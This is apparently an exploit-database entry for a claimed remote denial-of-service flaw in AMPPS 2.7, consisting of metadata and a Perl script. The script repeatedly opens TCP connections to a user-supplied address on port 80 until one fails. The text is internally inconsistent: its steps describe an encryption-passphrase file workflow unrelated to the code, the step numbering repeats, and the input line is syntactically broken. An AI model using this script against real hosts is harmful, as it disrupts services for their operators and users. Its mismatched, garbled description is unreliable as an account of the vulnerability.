# Exploit Title: AMPPS 2.7 # Discovery by: Fernando Mengali # Discovery Date: 22 january 2024 # Vendor Homepage: Homepage: http://www.ampps.com/ # Software Link: https://kent.dl.sourceforge.net/project/ampps/2.7/Ampps-2.7-setup.exe # Notification vendor: No reported # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Remote - Denial of Service (DoS) # Steps to Produce the Exploit: # 1 - Execute script # 2 - Copy content exploit.txt # 3 - File => Set Encryption Passphrase # 4 - Encrypt using Passphrase # 4 - Denied of Service #2. Proof of Concept - PoC #!/usr/bin/perl use IO::Socket; print "Enter address: "; my $ip = ; chomp($ip); my $port = 80; my @d; my $c = 0; while (1) { eval { my $socket = IO::Socket::INET->new( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp' ); die "Failed to socket: $!" unless $socket; print $socket "Denial of Service"; print "Attack !\n"; $c++; }; if ($@) { print "[+] Exploited successuful!\n"; ; last; } }